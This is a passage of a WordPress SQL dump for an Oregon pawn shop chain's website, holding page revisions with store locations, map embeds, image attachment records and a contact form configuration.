12:45:49','2015-03-09 19:45:49','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/ATG_light-bgrd.png',0,'attachment','image/png',0),(250,1,'2015-03-10 18:36:39','2015-03-11 01:36:39','[banner img=\"/fuze7/wp-content/uploads/2015/03/guitar.jpg\" banner_link=\"#\" title=\"Guitars\" text=\"We have guitars\" btn_text=\" \" target=\"_self\"]\r\n\r\n[banner img=\"/fuze7/wp-content/uploads/2015/03/ring.jpg\" banner_link=\"#\" title=\"Rings\" text=\"We have rings\" btn_text=\" \" target=\"_self\"]\r\n\r\n[banner img=\"/fuze7/wp-content/uploads/2015/03/gun.jpg\" banner_link=\"#\" title=\"Guns\" text=\"We have guns\" btn_text=\" \" target=\"_self\"]\r\n[clear]\r\n<h1 style=\"text-align: center;\">All That Glitters, Reinventing The Pawn Shop</h1>\r\n[row_fluid]\r\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]\r\n[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]\r\n[one_third]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_third]\r\n[/row_fluid]\r\n<h2><strong>Oregon Locations</strong></h2>\r\n<h4>[row]\r\n[span1][/span1]\r\n<strong>[span2]Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/12200+SE+Division+St,+Portland,+OR+97236/@45.5038667,-122.5373076,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a1c202f16d99:0xd11d950ef929fd57\" target=\"_blank\">12200 SE Division</a>\r\n503-761-9699[/span2]\r\n<strong>[span2]N. Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/2932+N+Lombard+St,+Portland,+OR+97217/@45.576969,-122.6973386,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a7bc5175458b:0x6a338a6c83521185\" target=\"_blank\">2932 N. Lombard</a>\r\n503-247-1019[/span2]\r\n<strong>[span2]Tigard</strong>\r\n<a href=\"https://www.google.com/maps/place/12760+SW+Pacific+Hwy,+Tigard,+OR+97223/@45.4270242,-122.7771537,17z/data=!3m1!4b1!4m2!3m1!1s0x54950d2478b9878b:0x8606ae6c36002c06\" target=\"_blank\">12760 SW Pacific Hwy</a>\r\n503-968-9510[/span2]\r\n<strong>[span2]Milwaukie</strong>\r\n<a href=\"https://www.google.com/maps/place/15114+SE+McLoughlin+Blvd,+Milwaukie,+OR+97267/@45.413827,-122.629546,17z/data=!3m1!4b1!4m2!3m1!1s0x5495745ed4b97ea3:0x718f1732179ebc6e\" target=\"_blank\">15114 SE McLoughlin</a>\r\n503-785-1168[/span2]\r\n<strong>[span2]Salem</strong>\r\n<a href=\"https://www.google.com/maps/place/1191+Lancaster+Dr+NE,+Salem,+OR+97301/@44.945026,-122.98391,17z/data=!3m1!4b1!4m2!3m1!1s0x54bffec2370440b3:0x851994b509c59f4b\" target=\"_blank\">1191 Lancaster Dr NE</a>\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]</h4>\r\n \r\n\r\n ','Home','','inherit','open','open','','48-revision-v1','','','2015-03-10 18:36:39','2015-03-11 01:36:39','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(192,1,'2015-03-09 15:17:45','2015-03-09 22:17:45','<h1 style=\"text-align: center;\">All That Glitters, Reinventing The Pawn Shop</h1>\r\n[row_fluid]\r\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]\r\n[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]\r\n[one_third]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_third]\r\n[/row_fluid]\r\n<h2><strong>Oregon Locations</strong></h2>\r\n<h4>[row]\r\n[span1][/span1]\r\n<strong>[span2]S.E. Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/12200+SE+Division+St,+Portland,+OR+97236/@45.5038667,-122.5373076,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a1c202f16d99:0xd11d950ef929fd57\" target=\"_blank\">12200 SE Division</a>\r\n503-761-9699[/span2]\r\n<strong>[span2]N. Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/2932+N+Lombard+St,+Portland,+OR+97217/@45.576969,-122.6973386,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a7bc5175458b:0x6a338a6c83521185\" target=\"_blank\">2932 N. Lombard</a>\r\n503-247-1019[/span2]\r\n<strong>[span2]Tigard</strong>\r\n<a href=\"https://www.google.com/maps/place/12760+SW+Pacific+Hwy,+Tigard,+OR+97223/@45.4270242,-122.7771537,17z/data=!3m1!4b1!4m2!3m1!1s0x54950d2478b9878b:0x8606ae6c36002c06\" target=\"_blank\">12760 SW Pacific Hwy</a>\r\n503-968-9510[/span2]\r\n<strong>[span2]Milwaukie</strong>\r\n<a href=\"https://www.google.com/maps/place/15114+SE+McLoughlin+Blvd,+Milwaukie,+OR+97267/@45.413827,-122.629546,17z/data=!3m1!4b1!4m2!3m1!1s0x5495745ed4b97ea3:0x718f1732179ebc6e\" target=\"_blank\">15114 SE McLoughlin</a>\r\n503-785-1168[/span2]\r\n<strong>[span2]Salem</strong>\r\n<a href=\"https://www.google.com/maps/place/1191+Lancaster+Dr+NE,+Salem,+OR+97301/@44.945026,-122.98391,17z/data=!3m1!4b1!4m2!3m1!1s0x54bffec2370440b3:0x851994b509c59f4b\" target=\"_blank\">1191 Lancaster Dr NE</a>\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]</h4>\r\n \r\n\r\n<img class=\"alignleft size-medium wp-image-89\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"Milwaukie_outside\" width=\"300\" height=\"241\" />Lorem ipsum, morbi leo risus, porta ac conset','Home','','inherit','open','open','','48-revision-v1','','','2015-03-09 15:17:45','2015-03-09 22:17:45','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(153,1,'2015-03-09 12:55:15','2015-03-09 19:55:15','<h1 style=\"text-align: center;\">All That Glitters, Reinventing The Pawn Shop</h1>\r\n[row_fluid]\r\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]\r\n[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]\r\n[one_third]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_third]\r\n[/row_fluid]\r\n<h2><strong>Oregon Locations</strong></h2>\r\n<h4>[row]\r\n[span1][/span1]\r\n<strong>[span2]S.E. Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/12200+SE+Division+St,+Portland,+OR+97236/@45.5038667,-122.5373076,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a1c202f16d99:0xd11d950ef929fd57\" target=\"_blank\">12200 SE Division</a>\r\n503-761-9699[/span2]\r\n<strong>[span2]N. Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/2932+N+Lombard+St,+Portland,+OR+97217/@45.576969,-122.6973386,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a7bc5175458b:0x6a338a6c83521185\" target=\"_blank\">2932 N. Lombard</a>\r\n503-247-1019[/span2]\r\n<strong>[span2]Tigard</strong>\r\n<a href=\"https://www.google.com/maps/place/12760+SW+Pacific+Hwy,+Tigard,+OR+97223/@45.4270242,-122.7771537,17z/data=!3m1!4b1!4m2!3m1!1s0x54950d2478b9878b:0x8606ae6c36002c06\" target=\"_blank\">12760 SW Pacific Hwy</a>\r\n503-968-9510[/span2]\r\n<strong>[span2]Milwaukie</strong>\r\n<a href=\"https://www.google.com/maps/place/15114+SE+McLoughlin+Blvd,+Milwaukie,+OR+97267/@45.413827,-122.629546,17z/data=!3m1!4b1!4m2!3m1!1s0x5495745ed4b97ea3:0x718f1732179ebc6e\" target=\"_blank\">15114 SE McLoughlin</a>\r\n503-785-1168[/span2]\r\n<strong>[span2]Salem</strong>\r\n<a href=\"https://www.google.com/maps/place/1191+Lancaster+Dr+NE,+Salem,+OR+97301/@44.945026,-122.98391,17z/data=!3m1!4b1!4m2!3m1!1s0x54bffec2370440b3:0x851994b509c59f4b\" target=\"_blank\">1191 Lancaster Dr NE</a>\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]</h4>\r\n[row_fluid]\r\n[one_third]\r\n<img class=\"alignnone size-full wp-image-142\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/jewelry.jpg\" alt=\"jewelry\" width=\"318\" height=\"157\" />\r\n<h3>Jewelry</h3>\r\nLorem ipsum\r\n\r\n[/one_third]\r\n[one_third]\r\n<img class=\"alignnone size-full wp-image-143\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/loans.jpg\" alt=\"loans\" width=\"318\" height=\"157\" />\r\n<h3>Loans</h3>\r\nLorem ipsum\r\n[/one_third]\r\n[one_third]\r\n<img class=\"alignnone size-full wp-image-144\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/gold.jpg\" alt=\"gold\" width=\"318\" height=\"157\" />\r\n<h3>Gold</h3>\r\nLorem Ipsum\r\n[/one_third]\r\n[/row_fluid]\r\n\r\n<img class=\"alignleft size-medium wp-image-89\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"Milwaukie_outside\" width=\"300\" height=\"241\" />Lorem ipsum, morbi leo risus, porta ac conset','Home','','inherit','open','open','','48-revision-v1','','','2015-03-09 12:55:15','2015-03-09 19:55:15','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(162,1,'2015-03-09 13:46:23','2015-03-09 20:46:23','','Milwaukie_outside','','inherit','open','open','','milwaukie_outside-2','','','2015-03-09 13:46:44','2015-03-09 20:46:44','',83,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside1.jpg',0,'attachment','image/jpeg',0),(154,1,'2015-03-09 13:04:04','2015-03-09 20:04:04','','Lombard-outside','','inherit','open','open','','lombard-outside','','','2015-03-09 13:04:22','2015-03-09 20:04:22','',83,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-outside.jpg',0,'attachment','image/jpeg',0),(155,1,'2015-03-09 13:04:51','2015-03-09 20:04:51','','Lombard-inside','','inherit','open','open','','lombard-inside','','','2015-03-09 13:05:04','2015-03-09 20:05:04','',83,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-inside.jpg',0,'attachment','image/jpeg',0),(161,1,'2015-03-09 13:39:40','2015-03-09 20:39:40','','Milwaukie-inside','','inherit','open','open','','milwaukie-inside','','','2015-03-09 13:39:40','2015-03-09 20:39:40','',83,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie-inside.jpg',0,'attachment','image/jpeg',0),(157,1,'2015-03-09 13:11:28','2015-03-09 20:11:28','','Division-outside','','inherit','open','open','','division-outside','','','2015-03-09 13:11:46','2015-03-09 20:11:46','',83,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-outside.jpg',0,'attachment','image/jpeg',0),(158,1,'2015-03-09 13:12:24','2015-03-09 20:12:24','','Division-inside','','inherit','open','open','','division-inside','','','2015-03-09 13:12:40','2015-03-09 20:12:40','',83,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-inside.jpg',0,'attachment','image/jpeg',0),(159,1,'2015-03-09 13:12:55','2015-03-09 20:12:55','<h1 style=\"text-align: center;\"><strong>5 Oregon Locations, Open 7 Days a Week!</strong></h1>\r\n<h4 style=\"text-align: center;\"><strong>Monday - Saturday: 10:00 AM - 7:00 PM</strong></h4>\r\n<h4 style=\"text-align: center;\"><strong>Sunday: 11:00 AM - 5:00 PM</strong></h4>\r\n<strong>PORTLAND, OR: 2932 N. Lombard 503-247-1019</strong>\r\n[span4]\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-outside.jpg\"><img class=\"alignnone wp-image-154 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-outside-300x215.jpg\" alt=\"Lombard, All that Glitters\" width=\"300\" height=\"215\" /></a>\r\n\r\n[/span4]\r\n[span4]\r\n\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-inside.jpg\"><img class=\"alignnone wp-image-155 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-inside-300x215.jpg\" alt=\"Lombard, all that glitters\" width=\"300\" height=\"215\" /></a>\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2792.6752415075734!2d-122.6973386!3d45.576969!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495a7bc5175458b%3A0x6a338a6c83521185!2s2932+N+Lombard+St%2C+Portland%2C+OR+97217!5e0!3m2!1sen!2sus!4v1424971890870\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>PORTLAND, OR: 12200 SE Division 503-761-9699</strong>\r\n[span4]\r\n\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-outside.jpg\"><img class=\"alignnone wp-image-157 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-outside-300x221.jpg\" alt=\"Division, all that glitters\" width=\"300\" height=\"221\" /></a>[/span4]\r\n[span4]\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-inside.jpg\"><img class=\"alignnone wp-image-158 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-inside-300x215.jpg\" alt=\"Division inside, all that glitters\" width=\"300\" height=\"215\" /></a>\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2796.308567804789!2d-122.53730759999999!3d45.503866699999996!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495a1c202f16d99%3A0xd11d950ef929fd57!2s12200+SE+Division+St%2C+Portland%2C+OR+97236!5e0!3m2!1sen!2sus!4v1424972011050\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>MILWAUKIE, OR: 15114 SE McLoughlin 503-785-1168</strong>\r\n[span4]\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside.jpg\"><img class=\"alignnone wp-image-89 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"\" width=\"300\" height=\"241\" /></a>\r\n[/span4]\r\n[span4]\r\n\r\n[caption id=\"attachment_88\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside.jpg\"><img class=\"wp-image-88 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside-300x200.jpg\" alt=\"Milwaukie_inside\" width=\"300\" height=\"200\" /></a> 15114 SE McLoughlin[/caption]\r\n\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2800.7774589673077!2d-122.62954599999999!3d45.413827!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495745ed4b97ea3%3A0x718f1732179ebc6e!2s15114+SE+McLoughlin+Blvd%2C+Portland%2C+OR+97267!5e0!3m2!1sen!2sus!4v1424972438719\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>TIGARD, OR: 12760 SW Pacific Hwy 503-761-9699</strong>\r\n[span4]\r\n\r\n[caption id=\"attachment_93\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2.jpg\"><img class=\"wp-image-93 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2-300x199.jpg\" alt=\"Tigard_Site_Outside-2\" width=\"300\" height=\"199\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n[/span4]\r\n[span4]\r\n\r\n[caption id=\"attachment_92\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2.jpg\"><img class=\"wp-image-92 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2-300x177.jpg\" alt=\"Tigard_Inside_-2\" width=\"300\" height=\"177\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2800.122881897304!2d-122.7771537!3d45.427024200000005!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54950d2478b9878b%3A0x8606ae6c36002c06!2s12760+SW+Pacific+Hwy%2C+Tigard%2C+OR+97223!5e0!3m2!1sen!2sus!4v1424972494023\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>SALEM, OR: 1191 Lancaster Dr. NE 503-362-9939</strong>\r\n[span4]\r\n\r\n[caption id=\"attachment_91\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2.jpg\"><img class=\"wp-image-91 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2-300x131.jpg\" alt=\"Salem_Outside-2\" width=\"300\" height=\"131\" /></a> 1191 Lancaster Dr. NE[/caption]\r\n\r\n[/span4]\r\n[span4]\r\n\r\n[caption id=\"attachment_90\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2.jpg\"><img class=\"wp-image-90 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2-300x155.jpg\" alt=\"Salem_inside-2\" width=\"300\" height=\"155\" /></a> 1191 Lancaster Dr. NE[/caption]\r\n\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2823.9331948345302!2d-122.98391!3d44.945026!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54bffec2370440b3%3A0x851994b509c59f4b!2s1191+Lancaster+Dr+NE%2C+Salem%2C+OR+97301!5e0!3m2!1sen!2sus!4v1424972552736\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]','Locations','','inherit','open','open','','83-revision-v1','','','2015-03-09 13:12:55','2015-03-09 20:12:55','',83,'http://atgjewelry.com/fuze7/83-revision-v1/',0,'revision','',0),(160,1,'2015-03-09 13:39:12','2015-03-09 20:39:12','','Milwaukie-outside','','inherit','open','open','','milwaukie-outside','','','2015-03-09 13:39:29','2015-03-09 20:39:29','',83,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie-outside.jpg',0,'attachment','image/jpeg',0),(163,1,'2015-03-09 13:48:15','2015-03-09 20:48:15','','Milwaukie_inside','','inherit','open','open','','milwaukie_inside-2','','','2015-03-09 13:48:28','2015-03-09 20:48:28','',83,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside1.jpg',0,'attachment','image/jpeg',0),(165,1,'2015-03-09 13:52:39','2015-03-09 20:52:39','','Tigard-outside','','inherit','open','open','','tigard-outside','','','2015-03-09 13:52:52','2015-03-09 20:52:52','',83,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-outside.jpg',0,'attachment','image/jpeg',0),(166,1,'2015-03-09 13:53:01','2015-03-09 20:53:01','','Tigard-inside','','inherit','open','open','','tigard-inside','','','2015-03-09 13:53:13','2015-03-09 20:53:13','',83,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-inside.jpg',0,'attachment','image/jpeg',0),(168,1,'2015-03-09 13:56:12','2015-03-09 20:56:12','','Salem-inside','','inherit','open','open','','salem-inside','','','2015-03-09 13:56:25','2015-03-09 20:56:25','',83,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem-inside.jpg',0,'attachment','image/jpeg',0),(169,1,'2015-03-09 13:56:34','2015-03-09 20:56:34','','Salem-outside','','inherit','open','open','','salem-outside','','','2015-03-09 13:56:45','2015-03-09 20:56:45','',83,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem-outside.jpg',0,'attachment','image/jpeg',0),(171,1,'2015-03-09 13:58:25','2015-03-09 20:58:25','','Craigslist','','publish','open','open','','craigslist','','','2015-03-10 19:02:03','2015-03-11 02:02:03','',0,'http://atgjewelry.com/fuze7/?p=171',5,'nav_menu_item','',0),(172,1,'2015-03-09 14:11:01','2015-03-09 21:11:01','[row_fluid]\n[one_half]\nFill out this form to contact us, then we will reply by email:\n[contact-form-7 id=\"10\" title=\"Contact\"]\n<h2>Locations</h2>\n<strong>S.E. PORTLAND</strong>\n<a href=\"https://www.google.com/maps/place/12200+SE+Division+St,+Portland,+OR+97236/@45.5038667,-122.5373076,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a1c202f16d99:0xd11d950ef929fd57\" target=\"_blank\">12200 SE DIVISION</a>\n503-761-9699\n\n<strong>N. PORTLAND</strong>\n<a href=\"https://www.google.com/maps/place/2932+N+Lombard+St,+Portland,+OR+97217/@45.576969,-122.6973386,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a7bc5175458b:0x6a338a6c83521185\" target=\"_blank\">2932 N. LOMBARD</a>\n503-247-1019\n[/one_half]\n[one_half]<iframe src=\"https://www.google.com/maps/d/embed?mid=z4fRDBnmLvwA.ksG2JCjZpLY8&hl=en\" width=\"480\" height=\"480\"></iframe>[/one_half]\n[/row_fluid]','Contact','','inherit','open','open','','27-autosave-v1','','','2015-03-09 14:11:01','2015-03-09 21:11:01','',27,'http://atgjewelry.com/fuze7/27-autosave-v1/',0,'revision','',0),(173,1,'2015-03-09 14:08:21','2015-03-09 21:08:21','[one_half]\r\nFill out this form to contact us, then we will reply by email:\r\n[contact-form-7 id=\"10\" title=\"Contact\"][/one_half]\r\n[one_half]<iframe src=\"https://www.google.com/maps/d/embed?mid=z4fRDBnmLvwA.ksG2JCjZpLY8&hl=en\" width=\"480\" height=\"480\"></iframe>[/one_half]','Contact','','inherit','open','open','','27-revision-v1','','','2015-03-09 14:08:21','2015-03-09 21:08:21','',27,'http://atgjewelry.com/fuze7/27-revision-v1/',0,'revision','',0),(174,1,'2015-03-09 14:09:49','2015-03-09 21:09:49','[row_fluid]\r\n[one_half]\r\nFill out this form to contact us, then we will reply by email:\r\n[contact-form-7 id=\"10\" title=\"Contact\"][/one_half]\r\n[one_half]<iframe src=\"https://www.google.com/maps/d/embed?mid=z4fRDBnmLvwA.ksG2JCjZpLY8&hl=en\" width=\"480\" height=\"480\"></iframe>[/one_half]\r\n[/row_fluid]','Contact','','inherit','open','open','','27-revision-v1','','','2015-03-09 14:09:49','2015-03-09 21:09:49','',27,'http://atgjewelry.com/fuze7/27-revision-v1/',0,'revision','',0),(175,1,'2015-03-09 14:11:28','2015-03-09 21:11:28','[row_fluid]\r\n[one_half]\r\nFill out this form to contact us, then we will reply by email:\r\n[contact-form-7 id=\"10\" title=\"Contact\"]\r\n<h2>Locations</h2>\r\n<strong>S.E. PORTLAND</strong>\r\n<a href=\"https://www.google.com/maps/place/12200+SE+Division+St,+Portland,+OR+97236/@45.5038667,-122.5373076,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a1c202f16d99:0xd11d950ef929fd57\" target=\"_blank\">12200 SE DIVISION</a>\r\n503-761-9699\r\n\r\n<strong>N. PORTLAND</strong>\r\n<a href=\"https://www.google.com/maps/place/2932+N+Lombard+St,+Portland,+OR+97217/@45.576969,-122.6973386,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a7bc5175458b:0x6a338a6c83521185\" target=\"_blank\">2932 N. LOMBARD</a>\r\n503-247-1019\r\n\r\n<strong>TIGARD</strong>\r\n<a href=\"https://www.google.com/maps/place/12760+SW+Pacific+Hwy,+Tigard,+OR+97223/@45.4270242,-122.7771537,17z/data=!3m1!4b1!4m2!3m1!1s0x54950d2478b9878b:0x8606ae6c36002c06\" target=\"_blank\">12760 SW PACIFIC HWY</a>\r\n503-968-9510\r\n\r\n<strong>MILWAUKIE</strong>\r\n<a href=\"https://www.google.com/maps/place/15114+SE+McLoughlin+Blvd,+Milwaukie,+OR+97267/@45.413827,-122.629546,17z/data=!3m1!4b1!4m2!3m1!1s0x5495745ed4b97ea3:0x718f1732179ebc6e\" target=\"_blank\">15114 SE MCLOUGHLIN</a>\r\n503-785-1168\r\n\r\n<strong>SALEM</strong>\r\n<a href=\"https://www.google.com/maps/place/1191+Lancaster+Dr+NE,+Salem,+OR+97301/@44.945026,-122.98391,17z/data=!3m1!4b1!4m2!3m1!1s0x54bffec2370440b3:0x851994b509c59f4b\" target=\"_blank\">1191 LANCASTER DR NE</a>\r\n503-362-9939\r\n[/one_half]\r\n[one_half]<iframe src=\"https://www.google.com/maps/d/embed?mid=z4fRDBnmLvwA.ksG2JCjZpLY8&hl=en\" width=\"480\" height=\"480\"></iframe>[/one_half]\r\n[/row_fluid]','Contact','','inherit','open','open','','27-revision-v1','','','2015-03-09 14:11:28','2015-03-09 21:11:28','',27,'http://atgjewelry.com/fuze7/27-revision-v1/',0,'revision','',0),(176,1,'2015-03-09 14:16:46','2015-03-09 21:16:46','<table>\r\n<tr><td>Name *</td><td> [text* your-name] </td></tr>\r\n\r\n<tr><td>Email *</td><td>[email* your-email]</td></tr>\r\n\r\n<tr><td>Subject *</td><td>[text* your-subject] </td></tr>\r\n\r\n<tr><td>Message *</td><td>[textarea* your-message] </td></tr>\r\n\r\n<tr><td>Security Code</td><td>[captchac captcha]</td></tr>\r\n<tr><td>Retype Code *</td><td>[captchar captcha]</td></tr>\r\n<tr><td></td><td>[submit \"Send\"]</td></tr>\r\n</table>\n[your-subject]\n[your-name] <wordpress@atgjewelry.com>\nFrom: [your-name] <[your-email]>\r\nSubject: [your-subject]\r\n\r\nMessage Body:\r\n[your-message]\r\n\r\n--\r\nThis e-mail was sent from a contact form on fuze7 (http://atgjewelry.com/fuze7)\ndiane@fuze7.com\nReply-To: [your-email]\n\n1\n\n\n[your-subject]\nfuze7 <wordpress@atgjewelry.com>\nMessage Body:\r\n[your-message]\r\n\r\n--\r\nThis e-mail was sent from a contact form on fuze7 (http://atgjewelry.com/fuze7)\n[your-email]\nReply-To: daniel@tualatinweb.com\n\n\n\nYour message was sent successfully. Thanks.\nFailed to send your message. Please try later or contact the administrator by another method.\nValidation errors occurred. Please confirm the fields and submit it again.\nFailed to send your message. Please try later or contact the administrator by another method.\nPlease accept the terms to proceed.\nPlease fill in the required field.\nThis input is too long.\nThis input is too short.\nYour entered code is incorrect.\nNumber format seems invalid.\nThis number is too small.\nThis number is too large.\nEmail address seems invalid.\nURL seems invalid.\nTelephone number seems invalid.\nYour answer is not correct.\nDate format seems invalid.\nThis date is too early.\nThis date is too late.\nFailed to upload file.\nThis file type is not allowed.\nThis file is too large.\nFailed to upload file. Error occurred.','fuze7','','publish','open','open','','contact_copy','','','2015-03-09 14:17:35','2015-03-09 21:17:35','',0,'http://atgjewelry.com/fuze7/?post_type=wpcf7_contact_form&p=176',0,'wpcf7_contact_form','',0),(177,1,'2015-03-09 14:18:05','2015-03-09 21:18:05','[row_fluid]\r\n[one_half]\r\nFill out this form to contact us, then we will reply by email:\r\n[contact-form-7 id=\"176\" title=\"fuze7\"]\r\n<h2>Locations</h2>\r\n<strong>S.E. PORTLAND</strong>\r\n<a href=\"https://www.google.com/maps/place/12200+SE+Division+St,+Portland,+OR+97236/@45.5038667,-122.5373076,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a1c202f16d99:0xd11d950ef929fd57\" target=\"_blank\">12200 SE DIVISION</a>\r\n503-761-9699\r\n\r\n<strong>N. PORTLAND</strong>\r\n<a href=\"https://www.google.com/maps/place/2932+N+Lombard+St,+Portland,+OR+97217/@45.576969,-122.6973386,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a7bc5175458b:0x6a338a6c83521185\" target=\"_blank\">2932 N. LOMBARD</a>\r\n503-247-1019\r\n\r\n<strong>TIGARD</strong>\r\n<a href=\"https://www.google.com/maps/place/12760+SW+Pacific+Hwy,+Tigard,+OR+97223/@45.4270242,-122.7771537,17z/data=!3m1!4b1!4m2!3m1!1s0x54950d2478b9878b:0x8606ae6c36002c06\" target=\"_blank\">12760 SW PACIFIC HWY</a>\r\n503-968-9510\r\n\r\n<strong>MILWAUKIE</strong>\r\n<a 